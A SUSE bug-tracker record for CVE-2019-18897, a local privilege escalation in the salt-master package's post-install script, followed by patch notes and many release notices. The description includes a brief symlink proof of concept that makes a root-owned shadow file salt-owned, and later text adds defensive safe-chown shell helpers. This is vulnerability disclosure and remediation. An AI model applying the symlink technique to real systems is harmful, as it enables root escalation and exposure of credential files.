Bug 1157465 - (CVE-2019-18897) VUL-0: CVE-2019-18897: salt: Local privilege escalation from salt to root
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Audits
Importance: P3 - Medium, Normal
Assigned To: Security Team bot
URL: https://smash.suse.de/issue/247830/
CVSSv3.1:SUSE:CVE-2019-18897:8.4:(AV...
Blocks: 1154062
 
Reported: 2019-11-21 12:44 UTC by Johannes Segitz
Modified: 2021-06-23 11:46 UTC (History)


Attachments
Proposed patch (1.31 KB, patch)
2020-03-04 16:37 UTC, Pablo Suárez Hernández
Patch for CVE-2019-18897 (1.59 KB, patch)
2020-03-05 10:20 UTC, Pablo Suárez Hernández

Description Johannes Segitz 2019-11-21 12:44:17 UTC
1218 %post master
1219 if [ $1 -eq 2 ] ; then
1220   # Upgrading from an earlier version.  If this is from 2014, where daemons
1221   # ran as root, we need to chown some stuff to salt in order for the new
1222   # version to actually work.  It seems a manual restart of salt-master may
1223   # still be required, but at least this will actually work given the file
1224   # ownership is correct.
1225   for file in master.{pem,pub} ; do
1226     [ -f /etc/salt/pki/master/$file ] && chown salt /etc/salt/pki/master/$file
1227   done
1228   MASTER_CACHE_DIR="/var/cache/salt/master"
1229   [ -d $MASTER_CACHE_DIR ] && chown -R salt:salt $MASTER_CACHE_DIR
1230   [ -f $MASTER_CACHE_DIR/.root_key ] && chown root:root $MASTER_CACHE_DIR/.root_key
1231   true
1232 fi

This allows the user salt to escalate to root. PoC:
sh-5.0$ id
uid=158(salt) gid=444(salt) groups=444(salt)
sh-5.0$ pwd
/etc/salt/pki/master
sh-5.0$ ls -lah /test/
total 12K
drwxr-xr-x  2 root root 4.0K Nov 20 13:51 .
drwxr-xr-x 23 root root 4.0K Oct 25 11:01 ..
-rw-r-----  3 root root 1.2K Oct 25 13:20 shadow
sh-5.0$ ln -s /test/shadow master.pem

As root: zypper in -f salt-master

sh-5.0$ ls -lah /test/
total 12K
drwxr-xr-x  2 root root 4.0K Nov 20 13:51 .
drwxr-xr-x 23 root root 4.0K Oct 25 11:01 ..
-rw-r-----  3 salt root 1.2K Oct 25 13:20 shadow

The recursive chown can be exploited on systems with fs.protected_hardlinks=0.
We will not assign CVEs for these issues and have documented the risk here:
https://www.suse.com/support/kb/doc/?id=7024245
But it would still be good to get rid of it.

The chown in line 1230 can be used for DoS by making files unavailable to users/daemons.
Comment 1 Johannes Segitz 2019-11-22 13:10:52 UTC
This is CVE-2019-18897, NOT CVE-2019-3700 as stated earlier
Comment 7 Pablo Suárez Hernández 2020-03-04 16:37:34 UTC
Created attachment 831931 [details]
Proposed patch

This patch should prevent the user escalation by excluding any possible symlink at the time of executing "chown".

Security Team, what do you think about this patch?

Thanks in advance!
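
One way to implement the symlink exclusion described in this comment, extended to the hard-link case raised in the description. This is an added example, not the attached patch (whose contents are not shown on this page); the function names are hypothetical and `stat -c` is assumed to be available.

```shell
#!/bin/sh
# Added example: hardened ownership fix-up helpers for a package scriptlet.
# Function names are hypothetical; needs stat -c (GNU coreutils or busybox).

# chown a single path only if it is a regular file that is neither a symlink
# nor multiply hard-linked. Returns 0 when chowned, 1 when skipped.
safe_chown_file() {
    owner=$1
    path=$2
    # [ -f ] follows symlinks, so test for a link first.
    if [ -L "$path" ]; then
        echo "skip (symlink): $path" >&2
        return 1
    fi
    [ -f "$path" ] || return 1
    # More than one link: the inode is also reachable under another name.
    if [ "$(stat -c %h "$path")" -ne 1 ]; then
        echo "skip (link count > 1): $path" >&2
        return 1
    fi
    # -h keeps chown from dereferencing if a symlink is swapped in after
    # the checks; the checks on their own are racy.
    chown -h "$owner" "$path"
}

# Report entries a less privileged owner could have planted in a directory
# that root is about to chown: symlinks and multiply linked regular files.
list_unsafe_entries() {
    find "$1" -xdev \( -type l -o \( -type f -links +1 \) \) -print
}

# Recursive fix-up: find does not follow symlinks by default, and only
# directories and singly linked regular files are handed to chown -h.
safe_chown_tree() {
    owner=$1
    dir=$2
    if [ -L "$dir" ] || [ ! -d "$dir" ]; then
        return 1
    fi
    find "$dir" -xdev \( -type d -o \( -type f -links 1 \) \) \
        -exec chown -h "$owner" {} +
}

# Scriptlet usage with the paths from the report:
#   for f in master.pem master.pub; do
#       safe_chown_file salt "/etc/salt/pki/master/$f" || true
#   done
#   safe_chown_tree salt:salt /var/cache/salt/master || true
```

Running `list_unsafe_entries` on the key and cache directories before an upgrade shows which entries the helpers would skip.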
Comment 8 Pablo Suárez Hernández 2020-03-05 10:20:11 UTC
Created attachment 831993 [details]
Patch for CVE-2019-18897

Patch for CVE-2019-18897 after addressing feedback from security.
Comment 9 Pablo Suárez Hernández 2020-03-05 10:44:49 UTC
NOTE:

This CVE only affects the "salt-master" package, as the bug is in the %post script of the "salt-master" package.

The old Salt 2016.11.10 spec is still affected but we do not distribute the "salt-master" package from that version, only the "salt-minion" part.
Comment 11 Swamp Workflow Management 2020-03-05 13:30:05 UTC
This is an autogenerated message for OBS integration:
This bug (1157465) was mentioned in
https://build.opensuse.org/request/show/781848 Factory / salt
Comment 13 Swamp Workflow Management 2020-03-10 14:12:11 UTC
SUSE-RU-2020:0625-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: recommended (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    salt-2019.2.0-5.64.1
SUSE Linux Enterprise Server 15-LTSS (src):    salt-2019.2.0-5.64.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    salt-2019.2.0-5.64.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    salt-2019.2.0-5.64.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 15 Swamp Workflow Management 2020-03-13 17:28:30 UTC
SUSE-RU-2020:14320-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: recommended (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:

Comment 16 Swamp Workflow Management 2020-03-13 17:32:23 UTC
SUSE-SU-2020:0684-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: security (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:
SUSE Linux Enterprise Module for Server Applications 15-SP1 (src):    salt-2019.2.0-6.24.1
SUSE Linux Enterprise Module for Python2 15-SP1 (src):    salt-2019.2.0-6.24.1
SUSE Linux Enterprise Module for Basesystem 15-SP1 (src):    salt-2019.2.0-6.24.1

Comment 17 Swamp Workflow Management 2020-03-13 17:55:35 UTC
SUSE-RU-2020:0685-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: recommended (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:
SUSE Manager Tools 12 (src):    salt-2019.2.0-46.88.1
SUSE Manager Server 3.2 (src):    salt-2019.2.0-46.88.1
SUSE Manager Proxy 3.2 (src):    salt-2019.2.0-46.88.1
SUSE Linux Enterprise Point of Sale 12-SP2 (src):    salt-2019.2.0-46.88.1
SUSE Linux Enterprise Module for Advanced Systems Management 12 (src):    salt-2019.2.0-46.88.1

Comment 18 Swamp Workflow Management 2020-03-13 18:18:04 UTC
SUSE-RU-2020:14319-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: recommended (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:

Comment 19 Swamp Workflow Management 2020-03-18 20:16:53 UTC
openSUSE-SU-2020:0357-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: security (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:
openSUSE Leap 15.1 (src):    salt-2019.2.0-lp151.5.12.1
Comment 20 Swamp Workflow Management 2020-03-24 20:14:36 UTC
SUSE-SU-2020:14331-1: An update that solves one vulnerability and has four fixes is now available.

Category: security (important)
Bug References: 1157465,1162327,1162504,1163981,1165425
CVE References: CVE-2019-18897
Sources used:

Comment 21 Swamp Workflow Management 2020-03-24 20:15:55 UTC
SUSE-SU-2020:0763-1: An update that solves one vulnerability and has four fixes is now available.

Category: security (important)
Bug References: 1157465,1162327,1162504,1163981,1165425
CVE References: CVE-2019-18897
Sources used:
SUSE Manager Tools 15-BETA (src):    salt-2019.2.3-8.12.1

Comment 22 Swamp Workflow Management 2020-03-24 20:17:51 UTC
SUSE-SU-2020:14332-1: An update that solves one vulnerability and has four fixes is now available.

Category: security (important)
Bug References: 1157465,1162327,1162504,1163981,1165425
CVE References: CVE-2019-18897
Sources used:

Comment 23 Swamp Workflow Management 2020-03-24 20:22:45 UTC
SUSE-SU-2020:0762-1: An update that solves one vulnerability and has four fixes is now available.

Category: security (important)
Bug References: 1157465,1162327,1162504,1163981,1165425
CVE References: CVE-2019-18897
Sources used:
SUSE Manager Tools 12-BETA (src):    salt-2019.2.3-49.12.1

Comment 28 Swamp Workflow Management 2020-06-23 16:39:12 UTC
SUSE-SU-2020:14402-1: An update that solves 11 vulnerabilities and has 245 fixes is now available.

Category: security (moderate)
CVE References: CVE-2016-1866,CVE-2016-9639,CVE-2017-12791,CVE-2017-14695,CVE-2017-14696,CVE-2018-15750,CVE-2018-15751,CVE-2019-17361,CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:

Comment 30 Swamp Workflow Management 2020-07-21 04:37:25 UTC
SUSE-SU-2020:14431-1: An update that solves 11 vulnerabilities and has 251 fixes is now available.

Category: security (moderate)
CVE References: CVE-2016-1866,CVE-2016-9639,CVE-2017-12791,CVE-2017-14695,CVE-2017-14696,CVE-2018-15750,CVE-2018-15751,CVE-2019-17361,CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:

Comment 31 Swamp Workflow Management 2020-07-21 04:48:13 UTC
SUSE-SU-2020:1971-1: An update that solves three vulnerabilities and has 12 fixes is now available.

Category: security (moderate)
Bug References: 1157465,1159284,1162327,1165572,1167437,1168340,1169604,1169800,1170104,1170288,1170595,1171906,1172075,1173072,1174165
CVE References: CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:
SUSE Manager Tools 12 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1
SUSE Manager Server 3.2 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1
SUSE Manager Proxy 3.2 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1
SUSE Linux Enterprise Point of Sale 12-SP2 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1
SUSE Linux Enterprise Module for Advanced Systems Management 12 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1

Comment 32 Swamp Workflow Management 2020-07-21 05:02:33 UTC
SUSE-SU-2020:14430-1: An update that solves three vulnerabilities and has 18 fixes is now available.

Category: security (moderate)
Bug References: 1153090,1153277,1154940,1155372,1157465,1159284,1162327,1163871,1165572,1167437,1168340,1169604,1169800,1170104,1170288,1170595,1171687,1171906,1172075,1173072,1174165
CVE References: CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:

Comment 33 Swamp Workflow Management 2020-07-21 05:22:19 UTC
SUSE-SU-2020:14429-1: An update that solves three vulnerabilities and has 18 fixes is now available.

Category: security (moderate)
Bug References: 1153090,1153277,1154940,1155372,1157465,1159284,1162327,1163871,1165572,1167437,1168340,1169604,1169800,1170104,1170288,1170595,1171687,1171906,1172075,1173072,1174165
CVE References: CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:

Comment 34 Swamp Workflow Management 2020-07-21 05:24:53 UTC
SUSE-SU-2020:1973-1: An update that solves three vulnerabilities and has 12 fixes is now available.

Category: security (moderate)
Bug References: 1157465,1159284,1162327,1165572,1167437,1168340,1169604,1169800,1170104,1170288,1170595,1171906,1172075,1173072,1174165
CVE References: CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    salt-3000-5.78.1
SUSE Linux Enterprise Server 15-LTSS (src):    salt-3000-5.78.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    salt-3000-5.78.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    salt-3000-5.78.1

Comment 35 Jochen Breuer 2020-11-12 09:05:39 UTC
Can this be closed?
Comment 43 Swamp Workflow Management 2021-02-08 14:55:41 UTC
SUSE-SU-2021:0315-1: An update that solves 14 vulnerabilities and has 218 fixes is now available.

Category: security (moderate)
CVE References: CVE-2016-1866,CVE-2016-9639,CVE-2017-12791,CVE-2017-14695,CVE-2017-14696,CVE-2018-15750,CVE-2018-15751,CVE-2019-17361,CVE-2019-18897,CVE-2020-11651,CVE-2020-11652,CVE-2020-16846,CVE-2020-17490,CVE-2020-25592
Sources used:

Comment 44 Swamp Workflow Management 2021-02-08 15:30:58 UTC
SUSE-SU-2021:0316-1: An update that solves 14 vulnerabilities and has 218 fixes is now available.

Category: security (moderate)
CVE References: CVE-2016-1866,CVE-2016-9639,CVE-2017-12791,CVE-2017-14695,CVE-2017-14696,CVE-2018-15750,CVE-2018-15751,CVE-2019-17361,CVE-2019-18897,CVE-2020-11651,CVE-2020-11652,CVE-2020-16846,CVE-2020-17490,CVE-2020-25592
Sources used:

Comment 51 Johannes Segitz 2021-06-23 11:46:16 UTC
thanks for the fix